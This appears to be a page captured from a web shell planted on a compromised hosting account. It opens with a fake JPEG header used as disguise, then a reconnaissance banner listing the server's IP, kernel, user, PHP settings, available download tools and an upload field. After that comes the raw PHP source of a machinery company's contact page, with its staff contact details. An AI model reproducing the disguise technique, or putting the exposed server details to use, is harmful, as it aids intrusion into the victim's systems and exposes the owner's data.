���� JFIF fdasasfas213sdaf
Server IP : 91.108.106.130 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/hiltonmachinery.co.in/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Contact | Hilton Machinery</title> <?php include 'assets.php'; ?> </head> <body> <?php include 'header.php'; ?> <!--Page Title--> <section class="page-banner style-two" style="background-image:url(images/background/about-page-title-bg.jpg);"> <div class="auto-container"> <div class="inner-container clearfix"> <h1>Contact Hilton Machinery</h1> <ul class="bread-crumb clearfix"> <li><a href="index.php">Home</a></li> <li>Contact Us</li> </ul> </div> </div> </section> <!-- Contact Page Section --> <section class="contact-page-section"> <div class="auto-container"> <div class="row clearfix"> <!-- Info Column --> <div class="info-column col-lg-4 col-md-12 col-sm-12"> <div class="inner-column wow fadeInLeft" data-wow-delay="0ms"> <!-- Title Box --> <div class="title-box"> <h3>Contact Details</h3> <div class="title-text"> Get in touch with us for any questions about our industries or projects. </div> </div> <ul class="contact-info-list"> <li> <span class="icon icon-user"></span> <strong>CEO</strong> Hemantkumar Shantilal Mewada </li> <li> <span class="icon icon-home"></span> <strong>Head Office</strong> Shed No. 12/A, Akshardham Industrial Estate, Nr. Pancharatna Industrial Estate, Ramol Bridge, Ramol, Ahmedabad - 382449 Gujarat INDIA. </li> <li> <span class="icon icon-envelope-open"></span> <strong>Email us</strong> hiltonmachinery1512@gmail.com </li> <li> <span class="icon icon-call-in"></span> <strong>Call Support</strong> +91-99098 20806 | +91-79906 42729 </li> </ul> </div> </div> <!-- Form Column --> <div class="form-column col-lg-8 col-md-12 col-sm-12"> <div class="inner-column wow fadeInRight" data-wow-delay="0ms"> <!-- Sec Title --> <div class="sec-title"> <h2>Send a Message</h2> </div> <!-- Contact Form --> <div class="contact-form"> <?php include 'common-form.php'; ?> </div> </div> </div> </div> </div> </section> <?php include 'footer.php'; ?> </body> </html>